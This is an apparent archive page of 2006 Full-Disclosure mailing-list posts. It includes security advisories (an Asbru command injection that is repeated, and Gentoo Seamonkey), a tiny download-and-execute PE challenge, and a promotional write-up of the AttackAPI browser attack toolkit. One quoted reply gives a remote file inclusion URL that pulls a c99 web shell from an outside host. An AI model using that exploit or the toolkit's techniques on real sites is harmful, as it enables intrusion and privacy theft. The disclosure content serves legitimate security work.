Gil Dabah (who did the cool code crunching on the unsupported systems ZERT VML patch) just wrote some incredible code crunching. I don't understand most of it. The challange was to create a PE that downloads a file from the Internet and executes it, which will be smaller than what his friends did. He got to 411 bytes. He intends to keep working on it to get to below 400 bytes, and posts a sort of challenge to see if someone else can get there first (without, say, making the URL shorter). :) You can find the binary here: http://ragestorm.net/tiny/tiny.exe You can find his blog entry on what he did to achieve this, and the challenge, here: http://blogs.securiteam.com/index.php/archives/675 Gadi. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] AttackAPI 0.8 is OUT
http://www.gnucitizen.org/blog/attackapi-08-is-out http://www.gnucitizen.org/projects/attackapi I would recommend AttackAPI 0.8 to everyone who is interested in high-end. It provides a good demonstration of what is possible today. That, I hope will take our awareness even further. AttackAPI slowly moves to its 1.0 release where I am planning to standardize its core, fix discovered bugs and make it even more cross-platformed. Still, there is a long way to go but I am willing to take my chances. There are plans for 0.9 but I will keep them undisclosed for now. So what 0.8 has to offer? There are a couple of things that worth attention. I will start in chronological order. The Client interface can be used to enumerate the current client. It has functionalities to fingerprint the current operating system, installed plugins, the browser in use and the local NATed IP address and hostname. This tool is brilliant for doing the first steps of any targeted attack. The Server, on the other hand, can be used to fingerprint the current server. It provides information about its domain, IP address, platform, server software and the application architecture. Its purpose is to identify what is currently available. That is important because the Web is very distributed and agile network and controlling dozens of injected clients is a task on its own. The AuthorizationForcer interface is noting but a technique that can be used when the attacker is interested in discovering Basic Auth credentials. It is not very generic but it can be quite successfully executed on internal networks where the security is more relaxed and administrators make use of shortcut URLs to login to different devices. The ExtensionScanner interface is all the attacker needs to find currently installed extensions. Why is that important? Well, there is a lot one can say but in general that information can be used to find who is previewing the current resource (you are developer or a user), what services you are currently using (do you have flickr or del.icio.us extensions installed) and also locate vulnerable extensions. If you are developer, it is very likely that you have access to source code repositories. This information combined with other techniques can be used to steal your work or identify projects that are yet to be released. The age of professional attackers are slowly hitting the 21st century. The HistoryDumper is every web user nightmare when it comes to privacy. Attackers can abuse Firefox, IE and Opera accessibility functionalities to tell where you have been. The marketing tycoons will use it to sell you even more goods. This is an excellent tool for corporate espionage. Than it comes the NetworkSweeper. The tool does one thing only: discover live hosts. Currently it supports only one type of sweeping but in 0.9 and 1.0 versions of AttackAPI a lot more other techniques will be implemented. But what is a sweep without a port scan? Port scanning from JavaScript used to be considered an impossible task. Well, that's not the case anymore. Today attackers can use your browser to scan everybody they want without any fear of being penalized. Distributed scanning is also possible. Imagine how a well spread backdoored media file can scan the entire Internet for well known vulnerabilities (the VNC authentication bypass bug) in a quarter of the time required. That won't be possible without help from the NetworkCalculator. Generating IPs, cutting subnets, transforming IP address are just a few of the functionalities currently supported. Than the JavaScript shell is not what it seams to be. Yes, it is a good tool that you can use to quickly try JavaScript expressions but it is a lot more interesting to see the internal workings behind the fancy black console. In the core you will find functionalities that can be used to easily integrate a shell like interface to any web backdoor. Do you want to bind a fancy SQL console to a SQL Injection attack in order to emulate shell interface to the backend database? The MasterAPI library is ready to that. MasterAPI and the RequestBuilder from AttackAPI is all that the attacker needs to achieve that. Building XMLHttpRequest objects is quite easy. The use of them is up to your imagination. Sometimers attackers want to identify usersnames. If your username is Persi Johnson and you have a del.icio.us extension installed, it is quite likely that the same http://del.icio.us/PersiJohnson is you. The UsernameScanner is a handy trick that can be used in many situations. Enumerating local user names has never been easier. The URLScanner seam to be simple, yet, a lot more needs to be done to expose its efficiency. Do you want to run Nikto from your browser or you want to build a JavaScript based vulnerability scanning tool? All you need to do is to provide the database and the rest will be magically handled for you. Base64 is the right way of doing many things. So we use it here as well. GoogleSearch scares m
[Full-disclosure] Asbru HardCore Web Content Editor - Command Injection
n.runs GmbH http://www.nruns.com/ [EMAIL PROTECTED] n.runs-SA-2006.001 15-Oct-2006 Vendor:Asbru Software, http://asbrusoft.com Product: Asbru HardCore Web Content Editor, http://editor.asbrusoft.com/ Vulnerability: Command Injection Vendor communication: 2006/10/05initial notification of AsbruSoft 2006/10/08fix was created over the weekend, released on Oct 8. Overview: The Asbru Software Web Content Editor allows for web-based advanced text processing, replacing the typical TEXTAREA input fields with a rich user interface, offering HTML editing capabilities, formatting and various other features. It integrates with Asbru Software's Content Management System, works with most modern browsers and comes in versions for ASP, ASP.NET, PHP, ColdFusion and JSP. Description: The spell checking feature uses ASpell, which is invoked through the respective language's process creation commands, such as proc_open() in PHP, Runtime's exec() method in JSP, shell.Run() in ASP and the like. All these invocations are prone to a command injection attack, since ASpell's dictionary argument is specified from a HTTP request parameter and the input is not sanitized. This leads to immediate shell command execution if an attacker carefully crafts this parameter's value. The vulnerability is *only* present if the spell checking capability is in use. Solution: AsbruSoft reacted very quickly. The vulnerability was reported on Oct 5 and a fix was created over the weekend, released on Oct 8. The updated version 6.0.22 is available from http://editor.asbrusoft.com/page.php/id=727. Credit: Bug found by Jan Muenther of n.runs GmbH. Thanks References: None The information provided is released by n.runs "as is" without warranty of any kind. n.runs disclaims all warranties, either express or implied, expect for the warranties of merchantability. In no eventshall n.runs be liable for any damages whatsever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if n.runs has been advised of the possibility of such damages. Distribution or Reproduction of the information is provided that the advisory is not modified in any way. Copyright 2006 n.runs. All rights reserved. Terms of use. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vuln ....
On 10/16/06, wac <[EMAIL PROTECTED]> wrote: > Hey you could start by writing those sites in english :P > http://translate.google.com/translate?u=http%3A%2F%2FWwW.Pal-HackinG.Com+&langpair=ar%7Cen&hl=en&ie=UTF8 Not perfect but readable... I guess... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vuln ....
Hey you could start by writing those sites in english :POn 10/13/06, hitham hitham <[EMAIL PROTECTED] > wrote:===# Found By Sp1deR_NeT .. # E-mail :- [EMAIL PROTECTED]# Site's :- WwW.Sp1deR-N3T.Com +++ WwW.Pal-HackinG.Com # We Are :- PalEstine HackerS TeAm ..(Sp1deR_Net , MohajaLi , HACKERS PAL )*Script :- PHP rojekt5.1.1-Code Vuln :-$include_path = $path_pre.'lib/lib.inc.php'; include_once($include_path)In File :- editor_big.php-Exploit : lib/specialdays.php?$path_pre=www.soqor.net/tools/c99.txt?Example :- www.sitename.com/[path]/lib/specialdays.php?$path_pre=www.soqor.net/tools/c99.txt?- [EMAIL PROTECTED]Sp1deR_NeT ^__^===_ Be the first to hear what's new at MSN - sign up to our free newsletters!http://www.msn.co.uk/newsletters___Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Asbru HardCore Web Content Editor - Command Injection
n.runs GmbH http://www.nruns.com/ [EMAIL PROTECTED] n.runs-SA-2006.001 15-Oct-2006 Vendor:Asbru Software, http://asbrusoft.com Product: Asbru HardCore Web Content Editor, http://editor.asbrusoft.com/ Vulnerability: Command Injection Vendor communication: 2006/10/05initial notification of AsbruSoft 2006/10/08fix was created over the weekend, released on Oct 8. Overview: The Asbru Software Web Content Editor allows for web-based advanced text processing, replacing the typical TEXTAREA input fields with a rich user interface, offering HTML editing capabilities, formatting and various other features. It integrates with Asbru Software's Content Management System, works with most modern browsers and comes in versions for ASP, ASP.NET, PHP, ColdFusion and JSP. Description: The spell checking feature uses ASpell, which is invoked through the respective language's process creation commands, such as proc_open() in PHP, Runtime's exec() method in JSP, shell.Run() in ASP and the like. All these invocations are prone to a command injection attack, since ASpell's dictionary argument is specified from a HTTP request parameter and the input is not sanitized. This leads to immediate shell command execution if an attacker carefully crafts this parameter's value. The vulnerability is *only* present if the spell checking capability is in use. Solution: AsbruSoft reacted very quickly. The vulnerability was reported on Oct 5 and a fix was created over the weekend, released on Oct 8. The updated version 6.0.22 is available from http://editor.asbrusoft.com/page.php/id=727. Credit: Bug found by Jan Muenther of n.runs GmbH. Thanks References: None The information provided is released by n.runs "as is" without warranty of any kind. n.runs disclaims all warranties, either express or implied, expect for the warranties of merchantability. In no eventshall n.runs be liable for any damages whatsever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if n.runs has been advised of the possibility of such damages. Distribution or Reproduction of the information is provided that the advisory is not modified in any way. Copyright 2006 n.runs. All rights reserved. Terms of use. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200610-04 ] Seamonkey: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200610-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Seamonkey: Multiple vulnerabilities Date: October 16, 2006 Bugs: #147651 ID: 200610-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis The Seamonkey project has reported multiple security vulnerabilities in the application. Background == The SeaMonkey project is a community effort to deliver production-quality releases of code derived from the application formerly known as 'Mozilla Application Suite'. Affected packages = --- Package / Vulnerable / Unaffected --- 1 www-client/seamonkey < 1.0.5 >= 1.0.5 Description === A number of vulnerabilities have been found and fixed in Seamonkey. For details please consult the references below. Impact == The most severe vulnerability involves enticing a user to visit a malicious website, crashing the application and executing arbitrary code with the rights of the user running Seamonkey. Workaround == There is no known workaround at this time. Resolution == All Seamonkey users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-client/seamonkey-1.0.5" References == [ 1 ] CVE-2006-4253 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4253 [ 2 ] CVE-2006-4565 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4565 [ 3 ] CVE-2006-4566 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4566 [ 4 ] CVE-2006-4568 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4568 [ 5 ] CVE-2006-4570 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4570 [ 6 ] CVE-2006-4571 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4571 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200610-04.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgpIux90QjRs4.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: يرغب [EMAIL PROTECTED] tmail.com في التحدث إليك!
Because you are the pink hax0r... he need´s you for his next terror attack.cheersAm 16.10.2006 um 00:13 schrieb Pink Hat:Why would a terrorist want to add me to his MSN?-- Forwarded message --From: [EMAIL PROTECTED] <[EMAIL PROTECTED]>Date: Oct 15, 2006 2:15 PMSubject: يرغب [EMAIL PROTECTED] في التحدث إليك!To: [EMAIL PROTECTED] يرغب [EMAIL PROTECTED] في التحدث إليك! احصل على هذا البرنامج لتتمكن من الاتصال بشكل مباشر وفوري بأصدقائك أو أفراد عائلتك أو زملائك في العمل أو أي شخص آخر تختاره. انتقل إلى http://get.live.com/messenger/overview لتحميل البرنامج الذي ترغب في بدء استخدامه. اكتب عنوان البريد الإلكتروني الخاص بي:[EMAIL PROTECTED]بمجرد انتهاء التثبيت، قم بإضافتي إلى قائمة جهات الاتصال لديك باستخدام الزر "إضافة" وهذا العنوان. يمكنك باستخدام البرنامج: إرسال رسائل فورية؛ فهي سريعة وسهلة ومجانية!معرفة عندما يكون أصدقاؤك أو أفراد عائلتك متصلين.طلب جهاز الكمبيوتر الخاص بأحد الأصدقاء لإجراء محادثة صوتية.معرفة عندما يقوم صديقك بالرد على رسالة.تلقي إعلام عند وصول بريد إلكتروني جديد.إضافة الرموز إلى رسائلك. ملاحظة: قد لا يتوفر بعض تلك الميزات عند استخدام Messenger على أجهزة تختلف عن أجهزة الكمبيوتر الشخصية القياسية. ___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ PGP.sig Description: Signierter Teil der Nachricht ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
